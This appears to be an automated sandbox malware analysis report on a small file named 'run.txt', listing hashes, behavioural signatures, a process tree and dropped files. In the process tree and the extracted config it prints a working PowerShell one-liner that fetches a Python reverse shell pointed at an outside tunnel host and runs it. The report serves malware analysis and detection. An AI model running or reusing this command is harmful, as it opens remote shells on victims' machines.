Overview

overview

10

Static

static

1

run.txt

windows10-1703-x64

10

Resubmissions

04/09/2024, 20:23

240904-y6m31sxajd 1

04/09/2024, 20:18

240904-y3acravhmj 10

Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    04/09/2024, 20:18

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    run.txt

  • Size

    227B

  • MD5

    34a8172dd92f06c10aa22d52a421f8fd

  • SHA1

    e946fa378b75999d907db6748f1c046497a24358

  • SHA256

    7292508096e70698ee91b7a7bf82f8834933e805824d0a18bc892bd3afaadde4

  • SHA512

    5b4cb796e6adcbe0fa9385bb67a8437af88226d969cebc091582338cdfb7654945605ed82d914f89283a9e70b3e6b157d63dd8c341feddf792f00ce82feccb8e

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://www.revshells.com/Python3%20Windows?ip=following-intersection.gl.at.ply.gg&port=35259&shell=powershell&encoding=powershell

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Powershell Invoke Web Request.

    execution
  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies registry class 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 16 IoCs
  • Suspicious use of SendNotifyMessage 15 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\NOTEPAD.EXE
    C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\run.txt
    1⤵
    • Opens file in notepad (likely ransom note)
    PID:2804
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4236
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c " = 'https://www.revshells.com/Python3%20Windows?ip=following-intersection.gl.at.ply.gg&port=35259&shell=powershell&encoding=powershell'; Invoke-WebRequest -Uri -OutFile 'rs.py'; python 'rs.py';"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1020
  • C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2552
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -c "$url = 'https://www.revshells.com/Python3%20Windows?ip=following-intersection.gl.at.ply.gg&port=35259&shell=powershell&encoding=powershell'; Invoke-WebRequest -Uri $url -OutFile 'rs.py'; python 'rs.py';"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4692
  • C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1548
    • C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe"
      2⤵
      • Checks processor information in registry
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2512
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2512.0.271066929\1071197521" -parentBuildID 20221007134813 -prefsHandle 1736 -prefMapHandle 1728 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6d438037-94d5-4024-847b-d3a6a42de8fa} 2512 "\\.\pipe\gecko-crash-server-pipe.2512" 1816 1ec21392458 gpu
        3⤵
          PID:2924
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2512.1.1098956431\1557829280" -parentBuildID 20221007134813 -prefsHandle 2140 -prefMapHandle 2136 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f0925332-b3a8-41a0-ab60-6ed4b1d5ec72} 2512 "\\.\pipe\gecko-crash-server-pipe.2512" 2168 1ec1fffb058 socket
          3⤵
            PID:2244
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2512.2.2040617669\1077776308" -childID 1 -isForBrowser -prefsHandle 2872 -prefMapHandle 2868 -prefsLen 20931 -prefMapSize 233444 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4afc00b5-75bf-4fd6-bb7b-b6cfa7e31f7c} 2512 "\\.\pipe\gecko-crash-server-pipe.2512" 2844 1ec24096e58 tab
            3⤵
              PID:760
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2512.3.1538687055\1690616679" -childID 2 -isForBrowser -prefsHandle 3572 -prefMapHandle 3568 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e092efa6-5dfb-44c6-890b-c49510fe665e} 2512 "\\.\pipe\gecko-crash-server-pipe.2512" 3500 1ec1505f558 tab
              3⤵
                PID:2788
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2512.4.925704467\349261239" -childID 3 -isForBrowser -prefsHandle 4160 -prefMapHandle 4164 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {adfdaaaa-033f-4921-9167-4ae4f6b90868} 2512 "\\.\pipe\gecko-crash-server-pipe.2512" 4172 1ec25f4f558 tab
                3⤵
                  PID:4296
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2512.5.680599109\46346011" -childID 4 -isForBrowser -prefsHandle 4864 -prefMapHandle 4860 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cc391803-7aec-4023-a537-4564a689d3de} 2512 "\\.\pipe\gecko-crash-server-pipe.2512" 4872 1ec2674bb58 tab
                  3⤵
                    PID:2140
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2512.6.1936925568\1685958993" -childID 5 -isForBrowser -prefsHandle 5008 -prefMapHandle 5012 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {48cd2fcd-1e91-4241-b1e8-999e405f06bb} 2512 "\\.\pipe\gecko-crash-server-pipe.2512" 5000 1ec2674e558 tab
                    3⤵
                      PID:2888
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2512.7.1408523446\73104068" -childID 6 -isForBrowser -prefsHandle 5200 -prefMapHandle 5204 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c6403362-c031-49db-a060-b537ce6f5b24} 2512 "\\.\pipe\gecko-crash-server-pipe.2512" 5192 1ec2674eb58 tab
                      3⤵
                        PID:4312
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2512.8.2086814918\1787074758" -childID 7 -isForBrowser -prefsHandle 4588 -prefMapHandle 4692 -prefsLen 26328 -prefMapSize 233444 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0ec51557-7600-4172-964b-31cce480f901} 2512 "\\.\pipe\gecko-crash-server-pipe.2512" 5684 1ec26554058 tab
                        3⤵
                          PID:1712

                    Network

                          MITRE ATT&CK Enterprise v15

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                            Filesize

                            3KB

                            MD5

                            42d4b1d78e6e092af15c7aef34e5cf45

                            SHA1

                            6cf9d0e674430680f67260194d3185667a2bb77b

                            SHA256

                            c4089b4313f7b8b74956faa2c4e15b9ffb1d9e5e29ac7e00a20c48b8f7aef5e0

                            SHA512

                            d31f065208766eea61facc91b23babb4c94906fb564dc06d114cbbc4068516f94032c764c188bed492509010c5dbe61f096d3e986e0ae3e70a170a9986458930

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                            Filesize

                            50KB

                            MD5

                            2143b379fed61ab5450bab1a751798ce

                            SHA1

                            32f5b4e8d1387688ee5dec6b3cc6fd27b454f19e

                            SHA256

                            a2c739624812ada0913f2fbfe13228e7e42a20efdcb6d5c4e111964f9b620f81

                            SHA512

                            0bc39e3b666fdad76bcf4fe7e7729c9e8441aa2808173efc8030ce07c753cb5f7e25d81dd8ec75e7a5b6324b7504ff461e470023551976a2a6a415d6a4859bfa

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            Filesize

                            1KB

                            MD5

                            d0d61596eb984b6c2fc46a31c6562869

                            SHA1

                            25711adfdb0636c2292b52480c90c02ac9a76f67

                            SHA256

                            92318018a028fafe9f4eb94bcc8b6a6b910bb1fba71d0474b109286822816829

                            SHA512

                            e3202a8a93dde96f239b32583e163b32a39a4b05b0bcaf94fa9c606c20d2e6f339dee828c203a05be137bd7e1a6416cac18c5e12ddbd2250211cf4cbc20fc34c

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rffiou3x.gea.ps1
                            Filesize

                            1B

                            MD5

                            c4ca4238a0b923820dcc509a6f75849b

                            SHA1

                            356a192b7913b04c54574d18c28d46e6395428ab

                            SHA256

                            6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                            SHA512

                            4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                            Download Submit

                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\datareporting\glean\db\data.safe.bin
                            Filesize

                            2KB

                            MD5

                            39b03bd420b1e6276ee339b209718c57

                            SHA1

                            d839300c43ac73f5ff6e975af030a5f927732de2

                            SHA256

                            ed3b8e4d02326af67322b48933ef02e2c6285e50ffa694cce704033248df50a3

                            SHA512

                            621dabe474a163aee339af2026490b4f51ebee4b865ce3971c551aeeab4e341b7bb8222f5f19b7ae5c064e70b5bb505ae63419ff718aa420f78fc2e91392a9f4

                            Download Submit

                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\datareporting\glean\pending_pings\16c9b744-8aea-415d-ab1e-15cbbec08d4c
                            Filesize

                            746B

                            MD5

                            8dc8b2bb459bd74b52446eb7952aaab4

                            SHA1

                            05a7c4d5266d45ae74875f2d3feb5cf4fd35c6d4

                            SHA256

                            8e3ce21e0e7ccfd9461ded7473bc2ac047125e07d66e869ed166b8c20672601a

                            SHA512

                            7775bba39768279ad2086cc9a4b250fe599a0ae992dc7ab5b09d7a39def9c84762613d12f8ffa823e14300139b35e72460444bf8ced71119a793b02c2f952dd9

                            Download Submit

                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\datareporting\glean\pending_pings\81dfd637-4ff4-46d0-a137-8261a53d8747
                            Filesize

                            11KB

                            MD5

                            7533505919762c8594a2aac0e8e44d02

                            SHA1

                            7b06811899b18ec10fef5d0b6bfeb11991bdf932

                            SHA256

                            71ee86d50ee951c8762656b54f9cb7d822c9d8092d4d327e5bd027d10cb0683b

                            SHA512

                            9a19f90981f52386e4212a8979d98a0754c8767a4ad8dae85ef8bfef9f03ac94f8ea04e6c2b5bc8ec7c34b8bcae8054d316bde351e6e088ffb54eae468ba3e4e

                            Download Submit

                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\prefs-1.js
                            Filesize

                            6KB

                            MD5

                            cc087a6ee9159d1c376b6caabc285cd3

                            SHA1

                            4bc04d9d14f18261144ad032c5f7efe0e21231a9

                            SHA256

                            ee522ff18131a624458b66c39a41d19b8553fe31623f0f9bebaeea0293878f37

                            SHA512

                            3a669218fe92d567de7678dbe1eda011cea14f9b55f07efee9c93b26951aec0f8b380011d2cb8e3a6250682e4b98ef9227b54cdc10c6d4d914f24f24fbb7e0c4

                            Download Submit

                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\sessionstore-backups\recovery.jsonlz4
                            Filesize

                            3KB

                            MD5

                            7956da97baf68f57f8ef760a56f0e1ec

                            SHA1

                            8ec0532e34dbd85df6fad0571140b81dd7badf4d

                            SHA256

                            60b8b0bd04dbb668727183455c87c49d096554a43eb9e1c9c41c15acb7f49dd7

                            SHA512

                            d1e1453c1ed41bd18b2d47149bd3cf4ec9ffa19cadd7f0f39279544f37784f08beca930b4745cc3b9354834ef73f535eb0a9c413bce8c9e33f48135c8046ecc2

                            Download Submit

                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\sessionstore-backups\recovery.jsonlz4
                            Filesize

                            4KB

                            MD5

                            c475cc0eb2e55e1d7da450339489a56f

                            SHA1

                            3f6ff8f99abbfb4fe52f614bd776cbb9466b6277

                            SHA256

                            b15c4c8991d4e8fcf973f81a9f56b16ed45826da8fdba7ac024474c8edbfde7f

                            SHA512

                            71cd290e214af14482b096a85a63f19f1474d782485524f4486f5a82c08b0ea41fb596724e00c88d35e5bb864975ef06018e8ce4f816b3b474f29bb0a68be546

                            Download Submit

                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
                            Filesize

                            184KB

                            MD5

                            7f868e557b098795d645df9ea302427f

                            SHA1

                            001f3306144559b4049a8ab139b4139f51e59c0e

                            SHA256

                            b228e23ecfb7965e3badefcbb031de0b4bb887634bccb34a826ac8ac89124ac5

                            SHA512

                            56fd8aa514cc25db5a2c9191d665eaffe90182cc5e4f15317e0cfbc9adf7336d9ad937d20384b0504f784e5939b76b4c4b0020cb06e4a472c650355cc6c4c89a

                            Download Submit

                          • memory/4236-116-0x00007FF8C2B73000-0x00007FF8C2B74000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/4236-117-0x00007FF8C2B70000-0x00007FF8C355C000-memory.dmp

                            Filesize

                            9.9MB

                            Download

                          • memory/4236-47-0x000001EC4E6A0000-0x000001EC4E716000-memory.dmp

                            Filesize

                            472KB

                            Download

                          • memory/4236-36-0x000001EC4E150000-0x000001EC4E18C000-memory.dmp

                            Filesize

                            240KB

                            Download

                          • memory/4236-11-0x00007FF8C2B70000-0x00007FF8C355C000-memory.dmp

                            Filesize

                            9.9MB

                            Download

                          • memory/4236-2-0x00007FF8C2B73000-0x00007FF8C2B74000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/4236-8-0x00007FF8C2B70000-0x00007FF8C355C000-memory.dmp

                            Filesize

                            9.9MB

                            Download

                          • memory/4236-7-0x000001EC4DFE0000-0x000001EC4E002000-memory.dmp

                            Filesize

                            136KB

                            Download